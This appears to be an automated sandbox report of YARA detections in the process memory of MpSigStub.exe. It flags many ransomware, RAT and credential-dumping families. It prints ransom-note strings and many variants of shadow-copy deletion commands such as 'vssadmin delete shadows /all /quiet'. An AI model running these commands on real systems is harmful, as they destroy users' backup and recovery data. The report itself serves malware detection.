Source: Yara match	File source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Clay Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Thanos ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected CryLock ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected OCT Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Snatch Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Knot Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Gocoder ransomware

Show sources

Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, type: MEMORY

Yara detected WannaRen ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Ryuk ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Zeoticus ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Porn Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected DarkSide Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected HiddenTear ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected WormLocker Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Nephilim Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mailto ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Voidcrypt Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected GoGoogle ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Axiom Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Ransomware32

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Artemon Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Covid19 Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected CryptoWall ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Cryptolocker ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Marvel Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Cute Ransomware

Show sources

Source: Yara match	File source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected 0x0M4R Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Amnesia ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Found potential ransomware demand text

Show sources

Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: )Decrypting of your files is only possible
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: Decrypting of your files is only possible
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: )Decrypting of your files is only possible]
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All]
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin.exe delete shadows /all /quietx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /for=c: /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /for=d: /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /Quiet
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /quiet /all
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: !vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe delete shadows /all /quiet;wmic shadowcopy delete
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	Binary or memory string: /C vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: */c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: Fvssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: #vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: /c vssadmin delete shadows /all /quiet]
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: vssadmin delete shadows /all

Found string related to ransomware

Show sources

Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: &encrypted=

May drop file containing decryption instructions (likely related to ransomware)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: HELP_instructions.html
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: How to decrypt files.html
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: RESTORE_FILES.txt

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 38.3.MpSigStub.exe.138bd31742c.64.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd21de7c.219.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd21de7c.147.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd223b1a.220.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bea6a936.114.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138beac794e.189.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.148.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bcde53e1.182.raw.unpack, type: UNPACKEDPE	Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bea69132.113.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be2d6086.59.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 38.3.MpSigStub.exe.138bd61fbe2.56.unpack, type: UNPACKEDPE	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 38.3.MpSigStub.exe.138be22418a.58.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.210.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bdfb53f6.20.unpack, type: UNPACKEDPE	Matched rule: Metasploit Payloads - file msf.exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.197.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138beac8d52.188.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138bdfb53f6.75.unpack, type: UNPACKEDPE	Matched rule: Metasploit Payloads - file msf.exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 38.3.MpSigStub.exe.138beac794e.117.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138bd94c4f5.98.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 38.3.MpSigStub.exe.138bd21de7c.196.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138beac654a.187.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138be2d6086.53.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 38.3.MpSigStub.exe.138bd51435e.70.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138bd1720c9.183.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack, type: UNPACKEDPE	Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 38.3.MpSigStub.exe.138bd223b1a.148.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138be22418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.197.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd1d8af6.146.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd223b1a.220.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd1720c9.207.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd223b1a.210.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd16fc75.208.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 38.3.MpSigStub.exe.138be2d6086.218.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 38.3.MpSigStub.exe.138bd16fc75.184.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Tofu Trojan Author: Cylance
Source: 38.3.MpSigStub.exe.138bd21de7c.209.unpack, type: UNPACKEDPE	Matched rule: dump_tool Author: @patrickrolsen
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: korlia Author: Nick Hoffman
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 38.3.MpSigStub.exe.138beac8d52.115.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 38.3.MpSigStub.exe.138beac654a.116.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 38.3.MpSigStub.exe.138bd025981.88.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 38.3.MpSigStub.exe.138bd31742c.64.unpack, type: UNPACKEDPE	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Keylogger component Author: Microsoft
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Detects APT41 malware POISONPLUG Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 38.3.MpSigStub.exe.138bd8c206c.234.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: korlia Author: Nick Hoffman
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Detects ISMDoor Backdoor Author: Florian Roth
